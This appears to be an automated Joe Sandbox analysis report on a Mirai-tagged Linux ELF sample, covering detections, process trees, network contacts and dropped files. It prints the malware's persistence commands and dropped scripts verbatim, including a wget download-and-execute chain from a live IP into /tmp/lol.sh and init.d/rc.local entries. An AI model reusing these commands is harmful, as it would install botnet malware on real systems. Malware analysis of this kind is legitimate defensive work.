Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1531483
MD5:d5fe73e8c423b96772a82449541e22c6
SHA1:1560d25e99f594481bb8e259d9b99c71f445fdcd
SHA256:9c8a7f11a9e88d4fad182d64e245ca604de3b01ec273f629423a43e682402e1b
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1531483
Start date and time:2024-10-11 10:44:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 2s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal72.spre.troj.evad.linELF@0/10@0/0
Command:/tmp/na.elf
PID:6272
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • dash New Fork (PID: 6238, Parent: 4331)
  • rm (PID: 6238, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
  • dash New Fork (PID: 6239, Parent: 4331)
  • rm (PID: 6239, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj
  • na.elf (PID: 6272, Parent: 6170, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6286, Parent: 6272)
    • sh (PID: 6286, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6297, Parent: 6286)
      • systemctl (PID: 6297, Parent: 6286, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • na.elf New Fork (PID: 6322, Parent: 6272)
    • sh (PID: 6322, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6324, Parent: 6322)
      • chmod (PID: 6324, Parent: 6322, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mybinary
    • na.elf New Fork (PID: 6325, Parent: 6272)
    • sh (PID: 6325, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6327, Parent: 6325)
      • ln (PID: 6327, Parent: 6325, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    • na.elf New Fork (PID: 6328, Parent: 6272)
    • sh (PID: 6328, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/na.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting na.elf'\n /tmp/na.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping na.elf'\n killall na.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/na.elf"
    • na.elf New Fork (PID: 6330, Parent: 6272)
    • sh (PID: 6330, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/na.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6332, Parent: 6330)
      • chmod (PID: 6332, Parent: 6330, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/na.elf
    • na.elf New Fork (PID: 6333, Parent: 6272)
    • sh (PID: 6333, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6335, Parent: 6333)
      • mkdir (PID: 6335, Parent: 6333, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • na.elf New Fork (PID: 6336, Parent: 6272)
    • sh (PID: 6336, Parent: 6272, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6338, Parent: 6336)
      • ln (PID: 6338, Parent: 6336, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf
    • na.elf New Fork (PID: 6339, Parent: 6272)
  • udisksd New Fork (PID: 6283, Parent: 799)
  • dumpe2fs (PID: 6283, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6310, Parent: 6309)
  • snapd-env-generator (PID: 6310, Parent: 6309, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6350, Parent: 799)
  • dumpe2fs (PID: 6350, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: na.elfAvira: detected
Source: na.elfReversingLabs: Detection: 60%
Source: na.elfVirustotal: Detection: 60%Perma Link
Source: global trafficTCP traffic: 192.168.2.23:59978 -> 154.216.19.139:38242
Source: global trafficTCP traffic: 192.168.2.23:41008 -> 193.143.1.59:38242
Source: global trafficTCP traffic: 192.168.2.23:38834 -> 87.120.84.105:38242
Source: global trafficTCP traffic: 192.168.2.23:53016 -> 185.170.144.84:38242
Source: /tmp/na.elf (PID: 6272)Socket: 0.0.0.0:38242Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.105
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 185.170.144.84
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.59
Source: inittab.16.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr, na.elf.36.dr, mybinary.16.drString found in binary or memory: http://154.216.19.140/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal72.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

barindex
Source: /tmp/na.elf (PID: 6272)File: /etc/profileJump to behavior
Source: /tmp/na.elf (PID: 6272)File: /etc/rc.localJump to behavior
Source: /usr/bin/ln (PID: 6327)File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinaryJump to behavior
Source: /usr/bin/ln (PID: 6338)File: /etc/rc.d/S99na.elf -> /etc/init.d/na.elfJump to behavior
Source: /tmp/na.elf (PID: 6272)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6324)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6332)File: /etc/init.d/na.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/na.elf (PID: 6286)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
Source: /tmp/na.elf (PID: 6322)Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"Jump to behavior
Source: /tmp/na.elf (PID: 6325)Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"Jump to behavior
Source: /tmp/na.elf (PID: 6328)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/na.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting na.elf'\n /tmp/na.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping na.elf'\n killall na.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/na.elf"Jump to behavior
Source: /tmp/na.elf (PID: 6330)Shell command executed: sh -c "chmod +x /etc/init.d/na.elf >/dev/null 2>&1"Jump to behavior
Source: /tmp/na.elf (PID: 6333)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
Source: /tmp/na.elf (PID: 6336)Shell command executed: sh -c "ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf >/dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 6324)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinaryJump to behavior
Source: /bin/sh (PID: 6332)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/na.elfJump to behavior
Source: /bin/sh (PID: 6335)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
Source: /usr/bin/dash (PID: 6238)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpjJump to behavior
Source: /usr/bin/dash (PID: 6239)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpjJump to behavior
Source: /bin/sh (PID: 6297)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
Source: /tmp/na.elf (PID: 6272)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6324)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6332)File: /etc/init.d/na.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/na.elf (PID: 6272)Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinaryJump to dropped file
Source: /tmp/na.elf (PID: 6272)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
Source: /bin/sh (PID: 6328)Writes shell script file to disk with an unusual file extension: /etc/init.d/na.elfJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/na.elf (PID: 6272)File: /etc/init.d/mybinaryJump to dropped file
Source: /bin/sh (PID: 6328)File: /etc/init.d/na.elfJump to dropped file
Source: /tmp/na.elf (PID: 6272)Queries kernel information via 'uname': Jump to behavior
Source: na.elf, 6272.1.00007ffe59858000.00007ffe59879000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
Source: na.elf, 6272.1.000055ac0a753000.000055ac0a8a1000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: na.elf, 6272.1.00007ffe59858000.00007ffe59879000.rw-.sdmpBinary or memory string: /tmp/qemu-open.d1Mlmt
Source: na.elf, 6272.1.000055ac0a753000.000055ac0a8a1000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: na.elf, 6272.1.00007ffe59858000.00007ffe59879000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: na.elf, 6272.1.00007ffe59858000.00007ffe59879000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.d1Mlmt
Source: na.elf, 6272.1.00007ffe59858000.00007ffe59879000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Data Manipulation
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
2
File and Directory Permissions Modification
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531483 Sample: na.elf Startdate: 11/10/2024 Architecture: LINUX Score: 72 49 185.170.144.84, 38242, 53016, 53024 VDWELLEREE unknown 2->49 51 154.216.19.139, 38242, 59978, 59986 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->51 53 5 other IPs or domains 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 8 dash rm na.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 41 /etc/rc.local, POSIX 8->41 dropped 43 /etc/profile, ASCII 8->43 dropped 45 /etc/init.d/mybinary, POSIX 8->45 dropped 59 Sample tries to set files in /etc globally writable 8->59 61 Sample tries to persist itself using /etc/profile 8->61 63 Drops files in suspicious directories 8->63 65 Sample tries to persist itself using System V runlevels 8->65 18 na.elf sh 8->18         started        20 na.elf sh 8->20         started        22 na.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        47 /etc/init.d/na.elf, POSIX 24->47 dropped 67 Drops files in suspicious directories 24->67 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        signatures9 process10 signatures11 69 Sample tries to set files in /etc globally writable 28->69 71 Sample tries to persist itself using System V runlevels 31->71
SourceDetectionScannerLabelLink
na.elf61%ReversingLabsLinux.Backdoor.Mirai
na.elf61%VirustotalBrowse
na.elf100%AviraEXP/ELF.Mirai.W
SourceDetectionScannerLabelLink
/etc/rc.local0%ReversingLabs
/etc/rc.local0%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
http://154.216.19.140/10%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://154.216.19.140/inittab.16.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr, na.elf.36.dr, mybinary.16.drfalseunknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
154.216.19.139
unknownSeychelles
135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
87.120.84.105
unknownBulgaria
51189SHARCOM-ASBGfalse
185.170.144.84
unknownunknown
59753VDWELLEREEfalse
109.202.202.202
unknownSwitzerland
13030INIT7CHfalse
91.189.91.43
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
193.143.1.59
unknownunknown
57271BITWEB-ASRUfalse
91.189.91.42
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
154.216.19.139kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
    87.120.84.105kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
      185.170.144.84kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
        91.189.91.43na.elfGet hashmaliciousUnknownBrowse
          na.elfGet hashmaliciousUnknownBrowse
            na.elfGet hashmaliciousMiraiBrowse
              na.elfGet hashmaliciousChaosBrowse
                na.elfGet hashmaliciousUnknownBrowse
                  na.elfGet hashmaliciousUnknownBrowse
                    na.elfGet hashmaliciousUnknownBrowse
                      na.elfGet hashmaliciousMiraiBrowse
                        na.elfGet hashmaliciousUnknownBrowse
                          na.elfGet hashmaliciousMiraiBrowse
                            193.143.1.59dNBHFhYkoO.elfGet hashmaliciousMirai, OkiruBrowse
                              HUWwCrf0mn.elfGet hashmaliciousMirai, OkiruBrowse
                                0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                  7aodVUk6TV.elfGet hashmaliciousMirai, OkiruBrowse
                                    kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        91.189.91.42na.elfGet hashmaliciousUnknownBrowse
                                          na.elfGet hashmaliciousUnknownBrowse
                                            na.elfGet hashmaliciousMiraiBrowse
                                              na.elfGet hashmaliciousChaosBrowse
                                                na.elfGet hashmaliciousUnknownBrowse
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                      na.elfGet hashmaliciousMiraiBrowse
                                                        na.elfGet hashmaliciousUnknownBrowse
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            SHARCOM-ASBGRFQ.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 87.120.84.38
                                                            Purchase.docx.docGet hashmaliciousUnknownBrowse
                                                            • 87.120.84.38
                                                            Purchase.docx.docGet hashmaliciousUnknownBrowse
                                                            • 87.120.84.38
                                                            Purchase 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 87.120.84.38
                                                            kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                            • 87.120.84.105
                                                            ZtQY1K6aTi.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 87.120.84.5
                                                            Sig.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            • 87.120.84.140
                                                            http://87.120.84.22Get hashmaliciousUnknownBrowse
                                                            • 87.120.84.22
                                                            Browser Update.jsGet hashmaliciousBitRAT, RHADAMANTHYSBrowse
                                                            • 87.120.84.233
                                                            qqeng.pdf.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 87.120.84.233
                                                            SKHT-ASShenzhenKatherineHengTechnologyInformationCoSwiftcopy.docGet hashmaliciousUnknownBrowse
                                                            • 154.216.19.160
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 156.241.11.89
                                                            Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                            • 154.216.19.160
                                                            tFuSHSz7Fv.elfGet hashmaliciousMiraiBrowse
                                                            • 156.241.11.84
                                                            2NkFwDDoDy.elfGet hashmaliciousMiraiBrowse
                                                            • 156.241.11.83
                                                            Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 154.216.17.14
                                                            MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 154.216.18.214
                                                            4W5Y34sRmd.exeGet hashmaliciousAsyncRATBrowse
                                                            • 154.216.17.207
                                                            P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                            • 154.216.17.185
                                                            2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                                            • 156.241.11.62
                                                            INIT7CHna.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousChaosBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousUnknownBrowse
                                                            • 109.202.202.202
                                                            na.elfGet hashmaliciousMiraiBrowse
                                                            • 109.202.202.202
                                                            VDWELLEREEkj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                            • 185.170.144.84
                                                            https://bbavnetcash-empreasasnet.lat/local_pibee/login_pibee.php/Get hashmaliciousUnknownBrowse
                                                            • 185.170.144.32
                                                            10J.zipGet hashmaliciousRedLine, SectopRATBrowse
                                                            • 185.73.125.96
                                                            bIgxdEEcXm.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                            • 185.73.125.96
                                                            efekactk.dll.dllGet hashmaliciousUnknownBrowse
                                                            • 185.73.124.161
                                                            efekactk.dll.dllGet hashmaliciousUnknownBrowse
                                                            • 185.73.124.161
                                                            bGNq1S744A.exeGet hashmaliciousUnknownBrowse
                                                            • 185.73.124.17
                                                            bGNq1S744A.exeGet hashmaliciousUnknownBrowse
                                                            • 185.73.124.17
                                                            Hq0UKVWTFV.exeGet hashmaliciousIcedID Raccoon SmokeLoader VidarBrowse
                                                            • 185.170.144.51
                                                            Ru185nQI3s.exeGet hashmaliciousIcedID Raccoon SmokeLoader VidarBrowse
                                                            • 185.170.144.51
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            /etc/rc.localdNBHFhYkoO.elfGet hashmaliciousMirai, OkiruBrowse
                                                              HUWwCrf0mn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  7aodVUk6TV.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                Process:/tmp/na.elf
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):115
                                                                                Entropy (8bit):4.626263624757373
                                                                                Encrypted:false
                                                                                SSDEEP:3:KPJRXBDFfoC2ROLUc/KILbaaFOdFXa5O:WJRBhorK/baaeXCO
                                                                                MD5:D513726B1D7EBDE6A1B5934356F2BD67
                                                                                SHA1:5DCDCDF304A7F37DEF9F442371CAB9D4C28EC34F
                                                                                SHA-256:B8AC3D2C59BAD4187BC956142D78F8C72CE5B72A005E2D79F2B4BD6742D3AA62
                                                                                SHA-512:9E3FF42DC067EECB6265A251E566F3FD91DBC1D0D3176309A498D61C96DE51961692116293A6DAEB4E71F15C4798F33B450FA37A7B4A8341072EE8C752DE0249
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:run bootcmd_mmc0; /tmp/na.elf && wget http://154.216.19.140/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                Process:/tmp/na.elf
                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                Category:dropped
                                                                                Size (bytes):102
                                                                                Entropy (8bit):4.622912100980472
                                                                                Encrypted:false
                                                                                SSDEEP:3:TKH4vZKBDFzSDRFbROLUc/KILpaKB0dFLoKE0:h8BNSXbK/zBeLXE0
                                                                                MD5:4B5B2FBE86C784243A2A5E0E718DA130
                                                                                SHA1:9B62BD914A3FEA3991E8AAA7762D8F569B3DC005
                                                                                SHA-256:6BA5A76EAC58E9C095A609CAC67FDBA5081959E1D2C8A38B2C3945E06903F782
                                                                                SHA-512:CECE53405146B04138B5F2EB94DC16382CD385FA00010944D4FAE2C5DD33B384E585AD7E2629809454A0DC7FD9A94F6BBCA5618C7195CE364AC61D19AE221C86
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:#!/bin/sh./tmp/na.elf &.wget http://154.216.19.140/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                Process:/bin/sh
                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                Category:dropped
                                                                                Size (bytes):375
                                                                                Entropy (8bit):4.473964357967648
                                                                                Encrypted:false
                                                                                SSDEEP:6:h2RkSwHKd6Nx/UfANsK/JaJFCwWBvM3fAFPfUMdNfabwHeJdxL/RuYHdSOovpz33:QRkScNxX/UJgjvMYFEKN+dRRucSOyd3
                                                                                MD5:916B93508BC751523FCB5E05162CC224
